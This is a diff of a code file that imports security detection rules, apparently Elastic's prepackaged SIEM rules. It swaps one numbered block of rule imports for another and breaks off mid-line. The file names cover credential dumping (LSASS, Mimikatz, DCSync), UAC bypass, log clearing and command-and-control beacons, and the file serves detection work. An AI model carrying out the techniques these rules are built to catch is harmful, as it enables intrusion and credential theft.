-import rule599 from './persistence_screensaver_engine_unexpected_child_process.json';
-import rule600 from './persistence_screensaver_plist_file_modification.json';
-import rule601 from './credential_access_suspicious_lsass_access_memdump.json';
-import rule602 from './defense_evasion_suspicious_process_access_direct_syscall.json';
-import rule603 from './discovery_posh_suspicious_api_functions.json';
-import rule604 from './privilege_escalation_via_rogue_named_pipe.json';
-import rule605 from './credential_access_suspicious_lsass_access_via_snapshot.json';
-import rule606 from './defense_evasion_posh_process_injection.json';
-import rule607 from './collection_posh_keylogger.json';
-import rule608 from './defense_evasion_posh_assembly_load.json';
-import rule609 from './defense_evasion_powershell_windows_firewall_disabled.json';
-import rule610 from './execution_posh_portable_executable.json';
-import rule611 from './execution_posh_psreflect.json';
-import rule612 from './credential_access_suspicious_comsvcs_imageload.json';
-import rule613 from './impact_aws_eventbridge_rule_disabled_or_deleted.json';
-import rule614 from './defense_evasion_microsoft_defender_tampering.json';
-import rule615 from './initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json';
-import rule616 from './persistence_remote_password_reset.json';
-import rule617 from './privilege_escalation_azure_kubernetes_rolebinding_created.json';
-import rule618 from './collection_posh_audio_capture.json';
-import rule619 from './collection_posh_screen_grabber.json';
-import rule620 from './defense_evasion_posh_compressed.json';
-import rule621 from './defense_evasion_suspicious_process_creation_calltrace.json';
-import rule622 from './privilege_escalation_group_policy_iniscript.json';
-import rule623 from './privilege_escalation_group_policy_privileged_groups.json';
-import rule624 from './privilege_escalation_group_policy_scheduled_task.json';
-import rule625 from './defense_evasion_clearing_windows_console_history.json';
-import rule626 from './threat_intel_filebeat8x.json';
-import rule627 from './privilege_escalation_installertakeover.json';
-import rule628 from './credential_access_via_snapshot_lsass_clone_creation.json';
-import rule629 from './persistence_via_bits_job_notify_command.json';
-import rule630 from './execution_suspicious_java_netcon_childproc.json';
-import rule631 from './privilege_escalation_samaccountname_spoofing_attack.json';
-import rule632 from './credential_access_symbolic_link_to_shadow_copy_created.json';
-import rule633 from './credential_access_mfa_push_brute_force.json';
-import rule634 from './persistence_azure_global_administrator_role_assigned.json';
-import rule635 from './persistence_microsoft_365_global_administrator_role_assign.json';
-import rule636 from './lateral_movement_malware_uploaded_onedrive.json';
-import rule637 from './lateral_movement_malware_uploaded_sharepoint.json';
-import rule638 from './defense_evasion_ms_office_suspicious_regmod.json';
-import rule639 from './initial_access_o365_user_reported_phish_malware.json';
-import rule640 from './defense_evasion_microsoft_365_mailboxauditbypassassociation.json';
-import rule641 from './credential_access_disable_kerberos_preauth.json';
-import rule642 from './credential_access_posh_request_ticket.json';
-import rule643 from './credential_access_shadow_credentials.json';
-import rule644 from './privilege_escalation_pkexec_envar_hijack.json';
-import rule645 from './credential_access_seenabledelegationprivilege_assigned_to_user.json';
-import rule646 from './persistence_msds_alloweddelegateto_krbtgt.json';
-import rule647 from './defense_evasion_disable_posh_scriptblocklogging.json';
-import rule648 from './persistence_ad_adminsdholder.json';
-import rule649 from './privilege_escalation_windows_service_via_unusual_client.json';
-import rule650 from './credential_access_dcsync_replication_rights.json';
-import rule651 from './credential_access_lsass_memdump_handle_access.json';
-import rule652 from './credential_access_moving_registry_hive_via_smb.json';
-import rule653 from './credential_access_suspicious_winreg_access_via_sebackup_priv.json';
-import rule654 from './credential_access_spn_attribute_modified.json';
-import rule655 from './persistence_dontexpirepasswd_account.json';
-import rule656 from './persistence_sdprop_exclusion_dsheuristics.json';
-import rule657 from './credential_access_remote_sam_secretsdump.json';
-import rule658 from './defense_evasion_workfolders_control_execution.json';
-import rule659 from './credential_access_user_impersonation_access.json';
-import rule660 from './persistence_redshift_instance_creation.json';
-import rule661 from './persistence_crontab_creation.json';
-import rule662 from './privilege_escalation_krbrelayup_suspicious_logon.json';
-import rule663 from './privilege_escalation_krbrelayup_service_creation.json';
-import rule664 from './credential_access_relay_ntlm_auth_via_http_spoolss.json';
-import rule665 from './execution_shell_evasion_linux_binary.json';
-import rule666 from './execution_process_started_in_shared_memory_directory.json';
-import rule667 from './execution_abnormal_process_id_file_created.json';
-import rule668 from './execution_process_started_from_process_id_file.json';
-import rule669 from './privilege_escalation_suspicious_dnshostname_update.json';
-import rule670 from './command_and_control_connection_attempt_by_non_ssh_root_session.json';
-import rule671 from './execution_user_exec_to_pod.json';
-import rule672 from './defense_evasion_elastic_agent_service_terminated.json';
-import rule673 from './defense_evasion_proxy_execution_via_msdt.json';
+import rule29 from './credential_access_endgame_cred_dumping_detected.json';
+import rule30 from './credential_access_endgame_cred_dumping_prevented.json';
+import rule31 from './defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.json';
+import rule32 from './defense_evasion_clearing_windows_event_logs.json';
+import rule33 from './defense_evasion_delete_volume_usn_journal_with_fsutil.json';
+import rule34 from './defense_evasion_disable_windows_firewall_rules_with_netsh.json';
+import rule35 from './defense_evasion_misc_lolbin_connecting_to_the_internet.json';
+import rule36 from './defense_evasion_msbuild_making_network_connections.json';
+import rule37 from './defense_evasion_suspicious_certutil_commands.json';
+import rule38 from './defense_evasion_unusual_network_connection_via_rundll32.json';
+import rule39 from './defense_evasion_unusual_process_network_connection.json';
+import rule40 from './defense_evasion_via_filter_manager.json';
+import rule41 from './discovery_linux_hping_activity.json';
+import rule42 from './discovery_linux_nping_activity.json';
+import rule43 from './discovery_whoami_command_activity.json';
+import rule44 from './endgame_adversary_behavior_detected.json';
+import rule45 from './endgame_malware_detected.json';
+import rule46 from './endgame_malware_prevented.json';
+import rule47 from './endgame_ransomware_detected.json';
+import rule48 from './endgame_ransomware_prevented.json';
+import rule49 from './execution_command_prompt_connecting_to_the_internet.json';
+import rule50 from './execution_command_shell_started_by_svchost.json';
+import rule51 from './execution_endgame_exploit_detected.json';
+import rule52 from './execution_endgame_exploit_prevented.json';
+import rule53 from './execution_html_help_executable_program_connecting_to_the_internet.json';
+import rule54 from './execution_linux_netcat_network_connection.json';
+import rule55 from './execution_psexec_lateral_movement_command.json';
+import rule56 from './execution_register_server_program_connecting_to_the_internet.json';
+import rule57 from './execution_via_compiled_html_file.json';
+import rule58 from './impact_deleting_backup_catalogs_with_wbadmin.json';
+import rule59 from './impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json';
+import rule60 from './impact_volume_shadow_copy_deletion_via_wmic.json';
+import rule61 from './initial_access_rpc_remote_procedure_call_from_the_internet.json';
+import rule62 from './initial_access_rpc_remote_procedure_call_to_the_internet.json';
+import rule63 from './initial_access_script_executing_powershell.json';
+import rule64 from './initial_access_smb_windows_file_sharing_activity_to_the_internet.json';
+import rule65 from './initial_access_suspicious_ms_office_child_process.json';
+import rule66 from './initial_access_suspicious_ms_outlook_child_process.json';
+import rule67 from './lateral_movement_direct_outbound_smb_connection.json';
+import rule68 from './lateral_movement_service_control_spawned_script_int.json';
+import rule69 from './persistence_adobe_hijack_persistence.json';
+import rule70 from './persistence_local_scheduled_task_creation.json';
+import rule71 from './persistence_priv_escalation_via_accessibility_features.json';
+import rule72 from './persistence_shell_activity_by_web_server.json';
+import rule73 from './persistence_system_shells_via_services.json';
+import rule74 from './persistence_user_account_creation.json';
+import rule75 from './persistence_via_application_shimming.json';
+import rule76 from './privilege_escalation_endgame_cred_manipulation_detected.json';
+import rule77 from './privilege_escalation_endgame_cred_manipulation_prevented.json';
+import rule78 from './privilege_escalation_endgame_permission_theft_detected.json';
+import rule79 from './privilege_escalation_endgame_permission_theft_prevented.json';
+import rule80 from './privilege_escalation_endgame_process_injection_detected.json';
+import rule81 from './privilege_escalation_endgame_process_injection_prevented.json';
+import rule82 from './privilege_escalation_unusual_parentchild_relationship.json';
+import rule83 from './impact_modification_of_boot_config.json';
+import rule84 from './privilege_escalation_uac_bypass_event_viewer.json';
+import rule85 from './defense_evasion_msxsl_network.json';
+import rule86 from './discovery_command_system_account.json';
+import rule87 from './command_and_control_certutil_network_connection.json';
+import rule88 from './defense_evasion_cve_2020_0601.json';
+import rule89 from './command_and_control_ml_packetbeat_dns_tunneling.json';
+import rule90 from './command_and_control_ml_packetbeat_rare_dns_question.json';
+import rule91 from './command_and_control_ml_packetbeat_rare_urls.json';
+import rule92 from './command_and_control_ml_packetbeat_rare_user_agent.json';
+import rule93 from './credential_access_credential_dumping_msbuild.json';
+import rule94 from './credential_access_ml_suspicious_login_activity.json';
+import rule95 from './defense_evasion_execution_msbuild_started_by_office_app.json';
+import rule96 from './defense_evasion_execution_msbuild_started_by_script.json';
+import rule97 from './defense_evasion_execution_msbuild_started_by_system_process.json';
+import rule98 from './defense_evasion_execution_msbuild_started_renamed.json';
+import rule99 from './defense_evasion_execution_msbuild_started_unusal_process.json';
+import rule100 from './defense_evasion_injection_msbuild.json';
+import rule101 from './execution_ml_windows_anomalous_script.json';
+import rule102 from './initial_access_ml_linux_anomalous_user_name.json';
+import rule103 from './initial_access_ml_windows_anomalous_user_name.json';
+import rule104 from './initial_access_ml_windows_rare_user_type10_remote_login.json';
+import rule105 from './ml_linux_anomalous_network_activity.json';
+import rule106 from './ml_linux_anomalous_network_port_activity.json';
+import rule107 from './ml_packetbeat_rare_server_domain.json';
+import rule108 from './ml_windows_anomalous_network_activity.json';
+import rule109 from './persistence_ml_linux_anomalous_process_all_hosts.json';
+import rule110 from './persistence_ml_rare_process_by_host_linux.json';
+import rule111 from './persistence_ml_rare_process_by_host_windows.json';
+import rule112 from './persistence_ml_windows_anomalous_path_activity.json';
+import rule113 from './persistence_ml_windows_anomalous_process_all_hosts.json';
+import rule114 from './persistence_ml_windows_anomalous_process_creation.json';
+import rule115 from './persistence_ml_windows_anomalous_service.json';
+import rule116 from './privilege_escalation_ml_windows_rare_user_runas_event.json';
+import rule117 from './execution_suspicious_pdf_reader.json';
+import rule118 from './privilege_escalation_sudoers_file_mod.json';
+import rule119 from './defense_evasion_iis_httplogging_disabled.json';
+import rule120 from './execution_python_tty_shell.json';
+import rule121 from './execution_perl_tty_shell.json';
+import rule122 from './defense_evasion_base16_or_base32_encoding_or_decoding_activity.json';
+import rule123 from './defense_evasion_file_mod_writable_dir.json';
+import rule124 from './defense_evasion_disable_selinux_attempt.json';
+import rule125 from './discovery_kernel_module_enumeration.json';
+import rule126 from './lateral_movement_telnet_network_activity_external.json';
+import rule127 from './lateral_movement_telnet_network_activity_internal.json';
+import rule128 from './privilege_escalation_setuid_setgid_bit_set_via_chmod.json';
+import rule129 from './defense_evasion_kernel_module_removal.json';
+import rule130 from './defense_evasion_attempt_to_disable_syslog_service.json';
+import rule131 from './defense_evasion_file_deletion_via_shred.json';
+import rule132 from './discovery_virtual_machine_fingerprinting.json';
+import rule133 from './defense_evasion_hidden_file_dir_tmp.json';
+import rule134 from './defense_evasion_deletion_of_bash_command_line_history.json';
+import rule135 from './impact_cloudwatch_log_group_deletion.json';
+import rule136 from './impact_cloudwatch_log_stream_deletion.json';
+import rule137 from './impact_rds_instance_cluster_stoppage.json';
+import rule138 from './persistence_attempt_to_deactivate_mfa_for_okta_user_account.json';
+import rule139 from './persistence_rds_cluster_creation.json';
+import rule140 from './credential_access_attempted_bypass_of_okta_mfa.json';
+import rule141 from './defense_evasion_okta_attempt_to_deactivate_okta_policy.json';
+import rule142 from './defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json';
+import rule143 from './defense_evasion_okta_attempt_to_modify_okta_network_zone.json';
+import rule144 from './defense_evasion_okta_attempt_to_modify_okta_policy.json';
+import rule145 from './defense_evasion_okta_attempt_to_modify_okta_policy_rule.json';
+import rule146 from './defense_evasion_waf_acl_deletion.json';
+import rule147 from './impact_attempt_to_revoke_okta_api_token.json';
+import rule148 from './impact_iam_group_deletion.json';
+import rule149 from './impact_possible_okta_dos_attack.json';
+import rule150 from './impact_rds_instance_cluster_deletion.json';
+import rule151 from './initial_access_suspicious_activity_reported_by_okta_user.json';
+import rule152 from './okta_threat_detected_by_okta_threatinsight.json';
+import rule153 from './persistence_administrator_privileges_assigned_to_okta_group.json';
+import rule154 from './persistence_attempt_to_create_okta_api_token.json';
+import rule155 from './persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json';
+import rule156 from './defense_evasion_cloudtrail_logging_deleted.json';
+import rule157 from './defense_evasion_ec2_network_acl_deletion.json';
+import rule158 from './impact_iam_deactivate_mfa_device.json';
+import rule159 from './defense_evasion_s3_bucket_configuration_deletion.json';
+import rule160 from './defense_evasion_guardduty_detector_deletion.json';
+import rule161 from './defense_evasion_okta_attempt_to_delete_okta_policy.json';
+import rule162 from './credential_access_iam_user_addition_to_group.json';
+import rule163 from './persistence_ec2_network_acl_creation.json';
+import rule164 from './impact_ec2_disable_ebs_encryption.json';
+import rule165 from './persistence_iam_group_creation.json';
+import rule166 from './defense_evasion_waf_rule_or_rule_group_deletion.json';
+import rule167 from './collection_cloudtrail_logging_created.json';
+import rule168 from './defense_evasion_cloudtrail_logging_suspended.json';
+import rule169 from './impact_cloudtrail_logging_updated.json';
+import rule170 from './initial_access_console_login_root.json';
+import rule171 from './defense_evasion_cloudwatch_alarm_deletion.json';
+import rule172 from './defense_evasion_ec2_flow_log_deletion.json';
+import rule173 from './defense_evasion_configuration_recorder_stopped.json';
+import rule174 from './exfiltration_ec2_snapshot_change_activity.json';
+import rule175 from './defense_evasion_config_service_rule_deletion.json';
+import rule176 from './persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json';
+import rule177 from './command_and_control_download_rar_powershell_from_internet.json';
+import rule178 from './initial_access_password_recovery.json';
+import rule179 from './command_and_control_cobalt_strike_beacon.json';
+import rule180 from './command_and_control_fin7_c2_behavior.json';
+import rule181 from './command_and_control_halfbaked_beacon.json';
+import rule182 from './credential_access_secretsmanager_getsecretvalue.json';
+import rule183 from './initial_access_via_system_manager.json';
+import rule184 from './privilege_escalation_root_login_without_mfa.json';
+import rule185 from './privilege_escalation_updateassumerolepolicy.json';
+import rule186 from './impact_hosts_file_modified.json';
+import rule187 from './elastic_endpoint_security.json';
+import rule188 from './external_alerts.json';
+import rule189 from './ml_cloudtrail_error_message_spike.json';
+import rule190 from './ml_cloudtrail_rare_error_code.json';
+import rule191 from './ml_cloudtrail_rare_method_by_city.json';
+import rule192 from './ml_cloudtrail_rare_method_by_country.json';
+import rule193 from './ml_cloudtrail_rare_method_by_user.json';
+import rule194 from './credential_access_aws_iam_assume_role_brute_force.json';
+import rule195 from './credential_access_okta_brute_force_or_password_spraying.json';
+import rule196 from './initial_access_unusual_dns_service_children.json';
+import rule197 from './initial_access_unusual_dns_service_file_writes.json';
+import rule198 from './lateral_movement_dns_server_overflow.json';
+import rule199 from './credential_access_root_console_failure_brute_force.json';
+import rule200 from './initial_access_unsecure_elasticsearch_node.json';
+import rule201 from './impact_virtual_network_device_modified.json';
+import rule202 from './credential_access_domain_backup_dpapi_private_keys.json';
+import rule203 from './persistence_gpo_schtask_service_creation.json';
+import rule204 from './credential_access_credentials_keychains.json';
+import rule205 from './credential_access_kerberosdump_kcc.json';
+import rule206 from './defense_evasion_attempt_del_quarantine_attrib.json';
+import rule207 from './execution_suspicious_psexesvc.json';
+import rule208 from './execution_via_xp_cmdshell_mssql_stored_procedure.json';
+import rule209 from './privilege_escalation_printspooler_service_suspicious_file.json';
+import rule210 from './privilege_escalation_printspooler_suspicious_spl_file.json';
+import rule211 from './defense_evasion_azure_diagnostic_settings_deletion.json';
+import rule212 from './execution_command_virtual_machine.json';
+import rule213 from './execution_via_hidden_shell_conhost.json';
+import rule214 from './impact_resource_group_deletion.json';
+import rule215 from './persistence_via_telemetrycontroller_scheduledtask_hijack.json';
+import rule216 from './persistence_via_update_orchestrator_service_hijack.json';
+import rule217 from './collection_update_event_hub_auth_rule.json';
+import 
rule218 from './credential_access_iis_apppoolsa_pwd_appcmd.json'; +import rule219 from './credential_access_iis_connectionstrings_dumping.json'; +import rule220 from './defense_evasion_event_hub_deletion.json'; +import rule221 from './defense_evasion_firewall_policy_deletion.json'; +import rule222 from './defense_evasion_sdelete_like_filename_rename.json'; +import rule223 from './lateral_movement_remote_ssh_login_enabled.json'; +import rule224 from './persistence_azure_automation_account_created.json'; +import rule225 from './persistence_azure_automation_runbook_created_or_modified.json'; +import rule226 from './persistence_azure_automation_webhook_created.json'; +import rule227 from './privilege_escalation_uac_bypass_diskcleanup_hijack.json'; +import rule228 from './credential_access_attempts_to_brute_force_okta_user_account.json'; +import rule229 from './credential_access_storage_account_key_regenerated.json'; +import rule230 from './defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json'; +import rule231 from './defense_evasion_system_critical_proc_abnormal_file_activity.json'; +import rule232 from './defense_evasion_unusual_system_vp_child_program.json'; +import rule233 from './discovery_blob_container_access_mod.json'; +import rule234 from './persistence_mfa_disabled_for_azure_user.json'; +import rule235 from './persistence_user_added_as_owner_for_azure_application.json'; +import rule236 from './persistence_user_added_as_owner_for_azure_service_principal.json'; +import rule237 from './defense_evasion_dotnet_compiler_parent_process.json'; +import rule238 from './defense_evasion_suspicious_managedcode_host_process.json'; +import rule239 from './execution_command_shell_started_by_unusual_process.json'; +import rule240 from './defense_evasion_masquerading_as_elastic_endpoint_process.json'; +import rule241 from './defense_evasion_masquerading_suspicious_werfault_childproc.json'; +import rule242 from 
'./defense_evasion_masquerading_werfault.json'; +import rule243 from './credential_access_key_vault_modified.json'; +import rule244 from './credential_access_mimikatz_memssp_default_logs.json'; +import rule245 from './defense_evasion_code_injection_conhost.json'; +import rule246 from './defense_evasion_network_watcher_deletion.json'; +import rule247 from './initial_access_external_guest_user_invite.json'; +import rule248 from './defense_evasion_azure_automation_runbook_deleted.json'; +import rule249 from './defense_evasion_masquerading_renamed_autoit.json'; +import rule250 from './initial_access_consent_grant_attack_via_azure_registered_application.json'; +import rule251 from './persistence_azure_conditional_access_policy_modified.json'; +import rule252 from './persistence_azure_privileged_identity_management_role_modified.json'; +import rule253 from './command_and_control_teamviewer_remote_file_copy.json'; +import rule254 from './defense_evasion_installutil_beacon.json'; +import rule255 from './defense_evasion_mshta_beacon.json'; +import rule256 from './defense_evasion_network_connection_from_windows_binary.json'; +import rule257 from './defense_evasion_rundll32_no_arguments.json'; +import rule258 from './defense_evasion_suspicious_scrobj_load.json'; +import rule259 from './defense_evasion_suspicious_wmi_script.json'; +import rule260 from './execution_ms_office_written_file.json'; +import rule261 from './execution_pdf_written_file.json'; +import rule262 from './lateral_movement_cmd_service.json'; +import rule263 from './persistence_app_compat_shim.json'; +import rule264 from './command_and_control_remote_file_copy_desktopimgdownldr.json'; +import rule265 from './command_and_control_remote_file_copy_mpcmdrun.json'; +import rule266 from './defense_evasion_execution_suspicious_explorer_winword.json'; +import rule267 from './defense_evasion_suspicious_zoom_child_process.json'; +import rule268 from './discovery_ml_linux_system_information_discovery.json'; +import 
rule269 from './discovery_ml_linux_system_network_configuration_discovery.json'; +import rule270 from './discovery_ml_linux_system_network_connection_discovery.json'; +import rule271 from './discovery_ml_linux_system_process_discovery.json'; +import rule272 from './discovery_ml_linux_system_user_discovery.json'; +import rule273 from './privilege_escalation_ml_linux_anomalous_sudo_activity.json'; +import rule274 from './resource_development_ml_linux_anomalous_compiler_activity.json'; +import rule275 from './discovery_post_exploitation_external_ip_lookup.json'; +import rule276 from './initial_access_zoom_meeting_with_no_passcode.json'; +import rule277 from './defense_evasion_gcp_logging_sink_deletion.json'; +import rule278 from './defense_evasion_gcp_pub_sub_topic_deletion.json'; +import rule279 from './defense_evasion_gcp_firewall_rule_created.json'; +import rule280 from './defense_evasion_gcp_firewall_rule_deleted.json'; +import rule281 from './defense_evasion_gcp_firewall_rule_modified.json'; +import rule282 from './defense_evasion_gcp_logging_bucket_deletion.json'; +import rule283 from './defense_evasion_gcp_storage_bucket_permissions_modified.json'; +import rule284 from './impact_gcp_storage_bucket_deleted.json'; +import rule285 from './initial_access_gcp_iam_custom_role_creation.json'; +import rule286 from './persistence_gcp_iam_service_account_key_deletion.json'; +import rule287 from './persistence_gcp_key_created_for_service_account.json'; +import rule288 from './credential_access_ml_linux_anomalous_metadata_process.json'; +import rule289 from './credential_access_ml_linux_anomalous_metadata_user.json'; +import rule290 from './credential_access_ml_windows_anomalous_metadata_process.json'; +import rule291 from './credential_access_ml_windows_anomalous_metadata_user.json'; +import rule292 from './defense_evasion_gcp_storage_bucket_configuration_modified.json'; +import rule293 from './defense_evasion_gcp_virtual_private_cloud_network_deleted.json'; +import 
rule294 from './defense_evasion_gcp_virtual_private_cloud_route_created.json'; +import rule295 from './defense_evasion_gcp_virtual_private_cloud_route_deleted.json'; +import rule296 from './exfiltration_gcp_logging_sink_modification.json'; +import rule297 from './impact_gcp_iam_role_deletion.json'; +import rule298 from './impact_gcp_service_account_deleted.json'; +import rule299 from './impact_gcp_service_account_disabled.json'; +import rule300 from './persistence_gcp_service_account_created.json'; +import rule301 from './collection_gcp_pub_sub_subscription_creation.json'; +import rule302 from './collection_gcp_pub_sub_topic_creation.json'; +import rule303 from './defense_evasion_gcp_pub_sub_subscription_deletion.json'; +import rule304 from './persistence_azure_pim_user_added_global_admin.json'; +import rule305 from './command_and_control_cobalt_strike_default_teamserver_cert.json'; +import rule306 from './defense_evasion_enable_inbound_rdp_with_netsh.json'; +import rule307 from './defense_evasion_execution_lolbas_wuauclt.json'; +import rule308 from './privilege_escalation_unusual_svchost_childproc_childless.json'; +import rule309 from './command_and_control_rdp_tunnel_plink.json'; +import rule310 from './privilege_escalation_uac_bypass_winfw_mmc_hijack.json'; +import rule311 from './discovery_privileged_localgroup_membership.json'; +import rule312 from './persistence_ms_office_addins_file.json'; +import rule313 from './discovery_adfind_command_activity.json'; +import rule314 from './discovery_security_software_wmic.json'; +import rule315 from './execution_command_shell_via_rundll32.json'; +import rule316 from './execution_suspicious_cmd_wmi.json'; +import rule317 from './lateral_movement_via_startup_folder_rdp_smb.json'; +import rule318 from './privilege_escalation_uac_bypass_com_interface_icmluautil.json'; +import rule319 from './privilege_escalation_uac_bypass_mock_windir.json'; +import rule320 from './defense_evasion_potential_processherpaderping.json'; +import 
rule321 from './privilege_escalation_uac_bypass_dll_sideloading.json'; +import rule322 from './execution_shared_modules_local_sxs_dll.json'; +import rule323 from './privilege_escalation_uac_bypass_com_clipup.json'; +import rule324 from './initial_access_via_explorer_suspicious_child_parent_args.json'; +import rule325 from './defense_evasion_from_unusual_directory.json'; +import rule326 from './execution_from_unusual_path_cmdline.json'; +import rule327 from './credential_access_kerberoasting_unusual_process.json'; +import rule328 from './discovery_peripheral_device.json'; +import rule329 from './lateral_movement_mount_hidden_or_webdav_share_net.json'; +import rule330 from './defense_evasion_deleting_websvr_access_logs.json'; +import rule331 from './defense_evasion_log_files_deleted.json'; +import rule332 from './defense_evasion_timestomp_touch.json'; +import rule333 from './lateral_movement_dcom_hta.json'; +import rule334 from './lateral_movement_execution_via_file_shares_sequence.json'; +import rule335 from './privilege_escalation_uac_bypass_com_ieinstal.json'; +import rule336 from './command_and_control_common_webservices.json'; +import rule337 from './command_and_control_encrypted_channel_freesslcert.json'; +import rule338 from './defense_evasion_process_termination_followed_by_deletion.json'; +import rule339 from './lateral_movement_remote_file_copy_hidden_share.json'; +import rule340 from './defense_evasion_attempt_to_deactivate_okta_network_zone.json'; +import rule341 from './defense_evasion_attempt_to_delete_okta_network_zone.json'; +import rule342 from './defense_evasion_okta_attempt_to_delete_okta_policy_rule.json'; +import rule343 from './impact_okta_attempt_to_deactivate_okta_application.json'; +import rule344 from './impact_okta_attempt_to_delete_okta_application.json'; +import rule345 from './impact_okta_attempt_to_modify_okta_application.json'; +import rule346 from './lateral_movement_dcom_mmc20.json'; +import rule347 from 
'./lateral_movement_dcom_shellwindow_shellbrowserwindow.json'; +import rule348 from './persistence_administrator_role_assigned_to_okta_user.json'; +import rule349 from './lateral_movement_executable_tool_transfer_smb.json'; +import rule350 from './command_and_control_dns_tunneling_nslookup.json'; +import rule351 from './lateral_movement_execution_from_tsclient_mup.json'; +import rule352 from './lateral_movement_rdp_sharprdp_target.json'; +import rule353 from './defense_evasion_clearing_windows_security_logs.json'; +import rule354 from './persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json'; +import rule355 from './defense_evasion_suspicious_short_program_name.json'; +import rule356 from './lateral_movement_incoming_wmi.json'; +import rule357 from './persistence_via_hidden_run_key_valuename.json'; +import rule358 from './credential_access_potential_ssh_bruteforce.json'; +import rule359 from './credential_access_promt_for_pwd_via_osascript.json'; +import rule360 from './lateral_movement_remote_services.json'; +import rule361 from './defense_evasion_domain_added_to_google_workspace_trusted_domains.json'; +import rule362 from './execution_suspicious_image_load_wmi_ms_office.json'; +import rule363 from './execution_suspicious_powershell_imgload.json'; +import rule364 from './impact_google_workspace_admin_role_deletion.json'; +import rule365 from './impact_google_workspace_mfa_enforcement_disabled.json'; +import rule366 from './persistence_application_added_to_google_workspace_domain.json'; +import rule367 from './persistence_evasion_registry_ifeo_injection.json'; +import rule368 from './persistence_google_workspace_admin_role_assigned_to_user.json'; +import rule369 from './persistence_google_workspace_custom_admin_role_created.json'; +import rule370 from './persistence_google_workspace_policy_modified.json'; +import rule371 from './persistence_google_workspace_role_modified.json'; +import rule372 from 
'./persistence_mfa_disabled_for_google_workspace_organization.json'; +import rule373 from './persistence_suspicious_image_load_scheduled_task_ms_office.json'; +import rule374 from './defense_evasion_masquerading_trusted_directory.json'; +import rule375 from './exfiltration_microsoft_365_exchange_transport_rule_creation.json'; +import rule376 from './initial_access_microsoft_365_exchange_safelinks_disabled.json'; +import rule377 from './persistence_appcertdlls_registry.json'; +import rule378 from './persistence_appinitdlls_registry.json'; +import rule379 from './persistence_microsoft_365_exchange_dkim_signing_config_disabled.json'; +import rule380 from './persistence_registry_uncommon.json'; +import rule381 from './persistence_run_key_and_startup_broad.json'; +import rule382 from './persistence_services_registry.json'; +import rule383 from './persistence_startup_folder_file_written_by_suspicious_process.json'; +import rule384 from './persistence_startup_folder_scripts.json'; +import rule385 from './persistence_suspicious_com_hijack_registry.json'; +import rule386 from './persistence_via_lsa_security_support_provider_registry.json'; +import rule387 from './defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json'; +import rule388 from './defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json'; +import rule389 from './defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json'; +import rule390 from './exfiltration_microsoft_365_exchange_transport_rule_mod.json'; +import rule391 from './initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json'; +import rule392 from './initial_access_microsoft_365_exchange_anti_phish_rule_mod.json'; +import rule393 from './lateral_movement_suspicious_rdp_client_imageload.json'; +import rule394 from './persistence_runtime_run_key_startup_susp_procs.json'; +import rule395 from './persistence_suspicious_scheduled_task_runtime.json'; +import rule396 from 
'./defense_evasion_microsoft_365_exchange_dlp_policy_removed.json'; +import rule397 from './lateral_movement_scheduled_task_target.json'; +import rule398 from './persistence_microsoft_365_exchange_management_role_assignment.json'; +import rule399 from './persistence_microsoft_365_teams_guest_access_enabled.json'; +import rule400 from './credential_access_dump_registry_hives.json'; +import rule401 from './defense_evasion_scheduledjobs_at_protocol_enabled.json'; +import rule402 from './persistence_ms_outlook_vba_template.json'; +import rule403 from './persistence_suspicious_service_created_registry.json'; +import rule404 from './privilege_escalation_named_pipe_impersonation.json'; +import rule405 from './credential_access_cmdline_dump_tool.json'; +import rule406 from './credential_access_copy_ntds_sam_volshadowcp_cmdline.json'; +import rule407 from './credential_access_lsass_memdump_file_created.json'; +import rule408 from './lateral_movement_incoming_winrm_shell_execution.json'; +import rule409 from './lateral_movement_powershell_remoting_target.json'; +import rule410 from './command_and_control_port_forwarding_added_registry.json'; +import rule411 from './defense_evasion_hide_encoded_executable_registry.json'; +import rule412 from './lateral_movement_rdp_enabled_registry.json'; +import rule413 from './privilege_escalation_printspooler_registry_copyfiles.json'; +import rule414 from './privilege_escalation_rogue_windir_environment_var.json'; +import rule415 from './initial_access_scripts_process_started_via_wmi.json'; +import rule416 from './command_and_control_iexplore_via_com.json'; +import rule417 from './command_and_control_remote_file_copy_scripts.json'; +import rule418 from './persistence_local_scheduled_task_scripting.json'; +import rule419 from './persistence_startup_folder_file_written_by_unsigned_process.json'; +import rule420 from './command_and_control_remote_file_copy_powershell.json'; +import rule421 from 
'./credential_access_microsoft_365_brute_force_user_account_attempt.json'; +import rule422 from './persistence_microsoft_365_teams_custom_app_interaction_allowed.json'; +import rule423 from './persistence_microsoft_365_teams_external_access_enabled.json'; +import rule424 from './credential_access_microsoft_365_potential_password_spraying_attack.json'; +import rule425 from './impact_stop_process_service_threshold.json'; +import rule426 from './collection_winrar_encryption.json'; +import rule427 from './defense_evasion_unusual_dir_ads.json'; +import rule428 from './discovery_admin_recon.json'; +import rule429 from './discovery_net_view.json'; +import rule430 from './discovery_remote_system_discovery_commands_windows.json'; +import rule431 from './persistence_via_windows_management_instrumentation_event_subscription.json'; +import rule432 from './credential_access_mimikatz_powershell_module.json'; +import rule433 from './execution_scripting_osascript_exec_followed_by_netcon.json'; +import rule434 from './execution_shell_execution_via_apple_scripting.json'; +import rule435 from './persistence_creation_change_launch_agents_file.json'; +import rule436 from './persistence_creation_modif_launch_deamon_sequence.json'; +import rule437 from './persistence_folder_action_scripts_runtime.json'; +import rule438 from './persistence_login_logout_hooks_defaults.json'; +import rule439 from './privilege_escalation_explicit_creds_via_scripting.json'; +import rule440 from './command_and_control_sunburst_c2_activity_detected.json'; +import rule441 from './defense_evasion_azure_application_credential_modification.json'; +import rule442 from './defense_evasion_azure_service_principal_addition.json'; +import rule443 from './defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json'; +import rule444 from './execution_apt_solarwinds_backdoor_child_cmd_powershell.json'; +import rule445 from './execution_apt_solarwinds_backdoor_unusual_child_processes.json'; +import rule446 from 
